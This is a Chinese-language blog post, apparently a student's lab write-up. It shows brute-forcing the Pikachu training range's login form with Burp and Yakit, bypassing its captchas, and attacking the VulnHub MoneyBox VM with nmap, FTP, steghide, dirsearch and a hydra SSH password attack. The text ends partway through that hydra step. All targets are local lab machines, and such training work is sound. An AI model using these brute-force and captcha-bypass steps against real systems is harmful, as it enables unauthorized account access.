<!DOCTYPE html>
<html lang="en">
<head>

    <!--[if lt IE 9]>
        <style>body {display: none; background: none !important} </style>
        <meta http-equiv="Refresh" Content="0; url=//outdatedbrowser.com/" />
    <![endif]-->

<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="format-detection" content="telephone=no" />
<meta name="author" content="Tangxianshen" />



<meta name="description" content="基于表单的暴力破解Burp的使用1.从老师那下载pikachu-master（皮卡丘靶场）的压缩包，将其移到虚拟机win10的phpstudy（小皮）的根目录下并解压。在小皮中打开网站，点击皮卡丘。2.进入第一关：基于表单的暴力破解。3.启动Burp,打开内置浏览器，把第一关的网址复制到内置浏览器，在表单的用户框和密码框中分别填入admin   admin4.看Burp的HTTP历史记录,找到po">
<meta property="og:type" content="article">
<meta property="og:title" content="基于表单的暴力破解，Burp,Yakit的使用，验证码绕过，攻破靶机moneybox">
<meta property="og:url" content="http://example.com/2024/01/08/%E5%9F%BA%E4%BA%8E%E8%A1%A8%E5%8D%95%E7%9A%84%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%EF%BC%8CBurp,Yakit%E7%9A%84%E4%BD%BF%E7%94%A8%EF%BC%8C%E9%AA%8C%E8%AF%81%E7%A0%81%E7%BB%95%E8%BF%87%EF%BC%8C%E6%94%BB%E7%A0%B4%E9%9D%B6%E6%9C%BAmoneybox/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="基于表单的暴力破解Burp的使用1.从老师那下载pikachu-master（皮卡丘靶场）的压缩包，将其移到虚拟机win10的phpstudy（小皮）的根目录下并解压。在小皮中打开网站，点击皮卡丘。2.进入第一关：基于表单的暴力破解。3.启动Burp,打开内置浏览器，把第一关的网址复制到内置浏览器，在表单的用户框和密码框中分别填入admin   admin4.看Burp的HTTP历史记录,找到po">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704626945256-ee3fcbf1-2e7c-4930-a136-66fd3477ed34.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704627071485-2892d12d-b551-4ce1-ac68-91fbbe96680f.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704627300634-c9dfd703-aed2-4550-b548-05cbeba28e66.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704627727908-8dce7490-f437-4d73-ba55-2f6186aa56f4.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704627835525-74d11754-8dfb-473d-8687-d0431c91a9f9.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704628126555-19ec4e49-a8bd-4f0f-899e-603bb12da8d4.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704628833595-7b55b094-43e2-40e2-88b8-4e8493f8be4c.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704628942120-a0d8ab91-350d-4150-be30-80d81df0bfc7.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704629688165-e532478c-e3e5-4a18-a78f-0f64eccce50e.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704629775975-8bdabc71-b361-49fb-b90d-50a8581c6f8b.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704630259162-cbeee131-a85a-438b-b6c7-94bb79d42aa4.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704630165214-c9c15b80-8445-4409-b812-9db67a000c7a.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704630354041-e304e822-614c-44e1-bde0-88360a827f42.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704631333007-7cc6262c-b222-4865-a0e6-1b9610f8184d.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704632752625-692a4d82-5162-4243-bd7c-450b1579be6f.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/40675946/1704633205359-f6c83d52-9474-47d4-b9b5-41b14192b0de.png#averageHue=%23fcfbfb&clientId=u4b7a7849-6dd3-4&from=paste&height=364&id=ub9fb3463&originHeight=364&originWidth=1700&originalType=binary&ratio=1&rotation=0&showTitle=false&size=40537&status=done&style=none&taskId=ufcc1e3da-7565-4868-8684-a288066a0e3&title=&width=1700">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704633336800-3944031f-194a-4dc5-b45e-9d50fdab9f85.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704374982933-9cfce813-baf2-484a-b355-01b4a77b2b5f.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704378038700-4882e0ae-09ed-4172-bfa2-05b9a8e55081.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704375648197-da29111d-75e3-4d05-a78b-a1e7350ab764.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704375831136-e0b03de3-658b-4cb8-b471-00a2b566252b.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704376209469-7b6febd3-9650-433e-961a-f10a05fdc9fb.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704376646650-f28935d3-576c-44f5-9d32-52dc8f2db351.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704377264016-328b4a66-7044-4d9d-b051-d83378f4f87e.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704377313332-283ba7bd-d8e9-493a-81e3-47eace781b89.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704378131929-ecd240e8-a2bc-4b3f-901b-3b28b184f303.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704378294299-d5c19da0-f8ba-451c-be4f-3dac7d8ddeed.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704378568681-c43fb703-5633-4ebc-a5d0-c32999a589b2.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704378815874-4fe6d18d-c45e-4be5-8a89-b84d8abd3ce6.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704379758742-4ae4cb37-a593-4777-abb1-675b92434049.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704380021520-c25c2745-df4f-4604-8e81-f2d5b1fe8463.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704380742628-409100ff-f286-4076-887b-0728edf27755.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704381623318-f8790253-ef91-4201-8d82-8fd2151f5845.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704381911973-2e22647d-74a7-4efa-bb88-ceb97ba0a7c6.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704382144208-99115ec2-8747-4b2e-a3d2-92e9feea80f4.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704382644575-9d9290b2-00cc-490c-aaba-cf48cfb35a18.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704382748624-f051e598-0291-4b24-810a-6c6d2390370c.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704383732564-15a5637c-10cb-4153-8c01-26e2647d8f85.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704383770933-01ebf4ac-a701-47b7-aa31-ac805de124c7.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704384273472-943465b7-2cdd-47b0-9133-394b642110f2.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704434828136-22510d78-ff7f-412d-a6bd-cf46d86e95f7.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704435074467-d0154aa6-339a-4a48-8b50-f0746a1eaed7.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704435586700-ab82fefa-4bb8-45c2-a279-f86692b44a83.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704436575644-e9fca066-b3ed-403c-adbf-7f11c0131c9d.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704439185033-a4cf177c-1e3a-4b37-b0aa-c82d8128e01c.png">
<meta property="article:published_time" content="2024-01-08T01:12:08.000Z">
<meta property="article:modified_time" content="2024-01-08T01:20:39.329Z">
<meta property="article:author" content="Tangxianshen">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704626945256-ee3fcbf1-2e7c-4930-a136-66fd3477ed34.png">

<link rel="apple-touch-icon" href= "/apple-touch-icon.png">


    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">



    <link rel="shortcut icon" href="/favicon.png">



    <link href="//cdn.bootcss.com/animate.css/3.5.1/animate.min.css" rel="stylesheet">



    <link href="//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.css" rel="stylesheet">



    <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
    <link href="//cdn.bootcss.com/pace/1.0.2/themes/blue/pace-theme-minimal.css" rel="stylesheet">



<link rel="stylesheet" href="/css/style.css">




<link href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">


<title>基于表单的暴力破解，Burp,Yakit的使用，验证码绕过，攻破靶机moneybox | Hexo</title>

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

<script>
    var yiliaConfig = {
        fancybox: true,
        animate: true,
        isHome: false,
        isPost: true,
        isArchive: false,
        isTag: false,
        isCategory: false,
        fancybox_js: "//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.js",
        scrollreveal: "//cdn.bootcss.com/scrollReveal.js/3.1.4/scrollreveal.min.js",
        search: false
    }
</script>


    <script> yiliaConfig.jquery_ui = [false]; </script>



    <script> yiliaConfig.rootUrl = "\/";</script>






<meta name="generator" content="Hexo 6.3.0"></head>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            <img src="/img/R-C.jpg" class="animated zoomIn">
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/"></a></h1>
        </hgroup>

        

        


        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>Menu</li>
                        <li>Tags</li>
                        
                        <li>Friends</li>
                        
                        
                        <li>About Me</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">主页</a></li>
                        
                            <li><a href="/archives/">所有文章</a></li>
                        
                            <li><a href="/tags/">标签云</a></li>
                        
                            <li><a href="/about/">关于我</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" href="mailto:123@123.com" title="Email"></a>
                            
                                <a class="fa GitHub" href="#" title="GitHub"></a>
                            
                                <a class="fa RSS" href="/atom.xml" title="RSS"></a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/Python/" rel="tag">Python</a></li></ul>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a class="main-nav-link switch-friends-link" target="_blank" rel="noopener" href="https://hexo.io">Hexo</a>
                    
                      <a class="main-nav-link switch-friends-link" target="_blank" rel="noopener" href="https://pages.github.com/">GitHub</a>
                    
                      <a class="main-nav-link switch-friends-link" target="_blank" rel="noopener" href="http://moxfive.xyz/">MOxFIVE</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">专注于前端</div>
                </section>
                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页"></a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                <img src="/img/R-C.jpg" class="animated zoomIn">
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页"></a></h1>
            </hgroup>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">主页</a></li>
                
                    <li><a href="/archives/">所有文章</a></li>
                
                    <li><a href="/tags/">标签云</a></li>
                
                    <li><a href="/about/">关于我</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" target="_blank" href="mailto:123@123.com" title="Email"></a>
                            
                                <a class="fa GitHub" target="_blank" href="#" title="GitHub"></a>
                            
                                <a class="fa RSS" target="_blank" href="/atom.xml" title="RSS"></a>
                            
                        </ul>
            </nav>
        </header>                
    </div>
    <link class="menu-list" tags="Tags" friends="Friends" about="About Me"/>
</nav>
      <div class="body-wrap"><article id="post-基于表单的暴力破解，Burp,Yakit的使用，验证码绕过，攻破靶机moneybox" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2024/01/08/%E5%9F%BA%E4%BA%8E%E8%A1%A8%E5%8D%95%E7%9A%84%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%EF%BC%8CBurp,Yakit%E7%9A%84%E4%BD%BF%E7%94%A8%EF%BC%8C%E9%AA%8C%E8%AF%81%E7%A0%81%E7%BB%95%E8%BF%87%EF%BC%8C%E6%94%BB%E7%A0%B4%E9%9D%B6%E6%9C%BAmoneybox/" class="article-date">
      <time datetime="2024-01-08T01:12:08.000Z" itemprop="datePublished">2024-01-08</time>
</a>


    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      基于表单的暴力破解，Burp,Yakit的使用，验证码绕过，攻破靶机moneybox
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        

        
        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <h2 id="基于表单的暴力破解"><a href="#基于表单的暴力破解" class="headerlink" title="基于表单的暴力破解"></a>基于表单的暴力破解</h2><h3 id="Burp的使用"><a href="#Burp的使用" class="headerlink" title="Burp的使用"></a>Burp的使用</h3><p>1.从老师那下载pikachu-master（皮卡丘靶场）的压缩包，将其移到虚拟机win10的phpstudy（小皮）的根目录下并解压。在小皮中打开网站，点击皮卡丘。<br>2.进入第一关：基于表单的暴力破解。<br>3.启动Burp,打开内置浏览器，把第一关的网址复制到内置浏览器，在表单的用户框和密码框中分别填入admin   admin<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704626945256-ee3fcbf1-2e7c-4930-a136-66fd3477ed34.png" alt="image.png"><br>4.看Burp的HTTP历史记录,找到post请求的数据包，右键发送到Intruder。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704627071485-2892d12d-b551-4ce1-ac68-91fbbe96680f.png" alt="image.png"><br>5.在Intruder中，下图的1过程改成集束炸弹，再点击2过程的清除payload的位置，3过程选中横线处，添加payload位置。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704627300634-c9dfd703-aed2-4550-b548-05cbeba28e66.png" alt="image.png"><br>6.点击位置旁边的payload，按下图添加admin<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704627727908-8dce7490-f437-4d73-ba55-2f6186aa56f4.png" alt="image.png"><br>7.在payload集选择2，然后在手动添加已知的真实密码123456，从下图的的从列表中添加密码。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704627835525-74d11754-8dfb-473d-8687-d0431c91a9f9.png" alt="image.png"><br>8.点击右上角的开始攻击，结果如下，35077和其他的长度有很大不同，爆出密码123456<br>注意，已知真实密码123456爆破出密码123456，这个只是测试的过程。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704628126555-19ec4e49-a8bd-4f0f-899e-603bb12da8d4.png" alt="image.png"></p>
<h3 id="Yakit的使用"><a href="#Yakit的使用" class="headerlink" title="Yakit的使用"></a>Yakit的使用</h3><p>1.免配置启动，清空历史请求，打开内置浏览器，把皮卡丘的第一关的网址复制到内置浏览器，在表单中输入admin admin。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704628833595-7b55b094-43e2-40e2-88b8-4e8493f8be4c.png" alt="image.png"><br>2.看历史记录，抓到了post数据包，点击下图的的FUZZ<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704628942120-a0d8ab91-350d-4150-be30-80d81df0bfc7.png" alt="image.png"><br>3.点击首页–&gt;点击首页里的payload–&gt;查看字典    （注意：可以在这里添加字典）<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704629688165-e532478c-e3e5-4a18-a78f-0f64eccce50e.png" alt="image.png"></p>
<p><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704629775975-8bdabc71-b361-49fb-b90d-50a8581c6f8b.png" alt="image.png"><br>4.返回web Fuzzer，删除两个admin，右键插入模糊测试字典，选择对应的字典。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704630259162-cbeee131-a85a-438b-b6c7-94bb79d42aa4.png" alt="image.png"><br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704630165214-c9c15b80-8445-4409-b812-9db67a000c7a.png" alt="image.png"><br>5.点击发送请求，再点击响应大小，均发送成功，发现有一个响应大小34695，与其他不同，爆出密码为123456<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704630354041-e304e822-614c-44e1-bde0-88360a827f42.png" alt="image.png"></p>
<h2 id="验证码绕过（on-server）"><a href="#验证码绕过（on-server）" class="headerlink" title="验证码绕过（on server）"></a>验证码绕过（on server）</h2><h3 id="Yakit的使用-1"><a href="#Yakit的使用-1" class="headerlink" title="Yakit的使用"></a>Yakit的使用</h3><p>1.由自动放行改为手动劫持，把第二关的网址复制到内置浏览器，填入admin admin 以及验证码。抓到数据包，右击界面发送到Web Fuzzer<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704631333007-7cc6262c-b222-4865-a0e6-1b9610f8184d.png" alt="image.png"></p>
<p>2.与之前的操作一样插入字典，发送请求，最后点自动放行。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704632752625-692a4d82-5162-4243-bd7c-450b1579be6f.png" alt="image.png"></p>
<h2 id="验证码绕过（on-client）"><a href="#验证码绕过（on-client）" class="headerlink" title="验证码绕过（on client）"></a>验证码绕过（on client）</h2><p>1.键入F12–&gt;点击三个点–&gt;设置–&gt;勾选 禁用js<br><img src="https://cdn.nlark.com/yuque/0/2024/png/40675946/1704633205359-f6c83d52-9474-47d4-b9b5-41b14192b0de.png#averageHue=%23fcfbfb&clientId=u4b7a7849-6dd3-4&from=paste&height=364&id=ub9fb3463&originHeight=364&originWidth=1700&originalType=binary&ratio=1&rotation=0&showTitle=false&size=40537&status=done&style=none&taskId=ufcc1e3da-7565-4868-8684-a288066a0e3&title=&width=1700" alt="image.png"></p>
<p><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704633336800-3944031f-194a-4dc5-b45e-9d50fdab9f85.png" alt="image.png"><br>2.后面的步骤和第二关验证码绕过（on server）一样了，不再赘述。</p>
<h2 id="攻破靶机的环境搭建"><a href="#攻破靶机的环境搭建" class="headerlink" title="攻破靶机的环境搭建"></a>攻破靶机的环境搭建</h2><h3 id="靶机moneybox安装和设置"><a href="#靶机moneybox安装和设置" class="headerlink" title="靶机moneybox安装和设置"></a>靶机moneybox安装和设置</h3><p>1.下载并安装Oracle VM VirtualBox，链接：<a target="_blank" rel="noopener" href="https://www.virtualbox.org/">https://www.virtualbox.org/</a><br>   下载moneybox.ova镜像，链接：<a target="_blank" rel="noopener" href="https://download.vulnhub.com/moneybox/MoneyBox.ova">https://download.vulnhub.com/moneybox/MoneyBox.ova</a><br>2.打开virtualBox,依次点击管理–&gt;导入虚拟电脑–&gt;找到moneybox.ova的安装路径，导入。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704374982933-9cfce813-baf2-484a-b355-01b4a77b2b5f.png" alt="image.png"><br>3.右击红色图标的靶机，网络–&gt;选择仅主机–&gt;选择virtualBox Host-Only Ethernet Adapter–&gt;点击OK。<br>–&gt;高级–&gt;查看靶机物理地址，并记住FF86<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704378038700-4882e0ae-09ed-4172-bfa2-05b9a8e55081.png" alt="image.png"><br>4.USB设备–&gt;选择USB1.1–&gt;点击OK<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704375648197-da29111d-75e3-4d05-a78b-a1e7350ab764.png" alt="image.png"><br>5.双击红色图标的靶机，启动。启动成功截图如下<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704375831136-e0b03de3-658b-4cb8-b471-00a2b566252b.png" alt="image.png"></p>
<h3 id="kali机设置"><a href="#kali机设置" class="headerlink" title="kali机设置"></a>kali机设置</h3><p>1.右击kali机，设置–&gt;添加网络适配器2–&gt;网络适配器设置为桥接，网络适配器2设置为NAT–&gt;点击确定<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704376209469-7b6febd3-9650-433e-961a-f10a05fdc9fb.png" alt="image.png"><br>2.打开kali机，在命令窗口输入ifconfig，可查找到网卡eth0和eth1的ip地址。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704376646650-f28935d3-576c-44f5-9d32-52dc8f2db351.png" alt="image.png"><br>3.依次输入下面的命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">  ifdown eth0                                 //关闭接口</span><br><span class="line">ifup eth0                                    //重启接口</span><br><span class="line">arp-scan -l -I eth0                         //在指定的网络接口 eth0 上执行ARP扫描。ARP扫描用于通过发送ARP请求并收集响应来发现本地网络上的设备</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704377264016-328b4a66-7044-4d9d-b051-d83378f4f87e.png" alt="image.png"></p>
<p><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704377313332-283ba7bd-d8e9-493a-81e3-47eace781b89.png" alt="image.png"></p>
<p><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704378131929-ecd240e8-a2bc-4b3f-901b-3b28b184f303.png" alt="image.png"><br>得知靶机的ip地址为192.168.56.101</p>
<h2 id="攻破靶机moneybox"><a href="#攻破靶机moneybox" class="headerlink" title="攻破靶机moneybox"></a>攻破靶机moneybox</h2><h3 id="扫描端口"><a href="#扫描端口" class="headerlink" title="扫描端口"></a>扫描端口</h3><p>1.输入命令<code>nmap -p- 192.168.56.101  </code><br>结果如下：  扫到21,22,80端口开放<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704378294299-d5c19da0-f8ba-451c-be4f-3dac7d8ddeed.png" alt="image.png"><br>2.向21,22,80端口发送请求，查看21,22,23端口状态<br>命令<code>nmap -p 21,22,80 -sC 192.168.56.101</code><br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704378568681-c43fb703-5633-4ebc-a5d0-c32999a589b2.png" alt="image.png"></p>
<h3 id="FTP协议的利用"><a href="#FTP协议的利用" class="headerlink" title="FTP协议的利用"></a>FTP协议的利用</h3><p>命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ftp 192.168.56.101                                //ftp连接到192.168.56.101</span><br><span class="line">ls                                                //查看内容</span><br><span class="line">help                                              //查看帮助命令</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704378815874-4fe6d18d-c45e-4be5-8a89-b84d8abd3ce6.png" alt="image.png"></p>
<h3 id="获取trytofind-jpg"><a href="#获取trytofind-jpg" class="headerlink" title="获取trytofind.jpg"></a>获取trytofind.jpg</h3><p>1.命令：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ftp&gt; get trytofind.jpg                                //获取图片</span><br><span class="line">ftp&gt; exit                                            //退出ftp</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704379758742-4ae4cb37-a593-4777-abb1-675b92434049.png" alt="image.png"><br>2.查看图片，没发现任何信息<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704380021520-c25c2745-df4f-4604-8e81-f2d5b1fe8463.png" alt="image.png"><br>3.看看二进制文件<br><code>strings trytofind.jpg</code><br>使用以上的命令查看.jpg .exe  .txt等文件，电脑都是以二进制的文件呈现的，而二进制是泛指的，不是指具体的0,1。二进制转化为十六进制字符，看字符比较容易理解。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704380742628-409100ff-f286-4076-887b-0728edf27755.png" alt="image.png"><br>一般图片不会有红色箭头指的一行括号，可能图片藏东西了。</p>
<h3 id="获取隐藏文件"><a href="#获取隐藏文件" class="headerlink" title="获取隐藏文件"></a>获取隐藏文件</h3><p>1.安装steghide   <code>apt install steghide</code></p>
<ol start="2">
<li>查看隐藏文件  <code>steghide info trytofind.jpg</code>    发现确实有隐藏文件，但缺少一个密钥</li>
</ol>
<h3 id="扫描目录"><a href="#扫描目录" class="headerlink" title="扫描目录"></a>扫描目录</h3><p>1.命令：<code>dirsearch -u 192.168.56.101 -x 403</code>   结果扫到一个目录blogs，然后去访问<a target="_blank" rel="noopener" href="http://192.168.56.101/blogs/">http://192.168.56.101/blogs/</a><br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704381623318-f8790253-ef91-4201-8d82-8fd2151f5845.png" alt="image.png"><br>2.右键检查网页，寻找信息。在查看器的最后一行，发现了另一个目录S3cr3t-T3xt<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704381911973-2e22647d-74a7-4efa-bb88-ceb97ba0a7c6.png" alt="image.png"></p>
<p><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704382144208-99115ec2-8747-4b2e-a3d2-92e9feea80f4.png" alt="image.png"><br>3.访问<a target="_blank" rel="noopener" href="http://192.168.56.101/">http://192.168.56.101/</a>S3cr3t-T3xt     同样的操作，发现了密钥key 3xtr4ctd4t4<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704382644575-9d9290b2-00cc-490c-aaba-cf48cfb35a18.png" alt="image.png"><br>4.命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">steghide  extract -sf trytofind.jpg                //提取隐藏文件</span><br><span class="line">cat data.txt                                       //看隐藏文件data.txt</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704382748624-f051e598-0291-4b24-810a-6c6d2390370c.png" alt="image.png"><br>5.data.txt中的内容为  你好。。。雷诺<br>    我告诉你一些重要的事，你的密码太弱了，请更改您的密码不要低估它。。。。。。。</p>
<h3 id="爆破密码"><a href="#爆破密码" class="headerlink" title="爆破密码"></a>爆破密码</h3><p>6.说明renu密码是弱密码，开始用hydra爆破他的密码，命令如下:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">hydra -h</span><br><span class="line">cd Desktop  </span><br><span class="line">hydra -l renu -P ./1 ssh://192.168.56.101                  //  1是桌面新建的文件，文件里是自建的密码字典</span><br><span class="line"></span><br></pre></td></tr></table></figure>

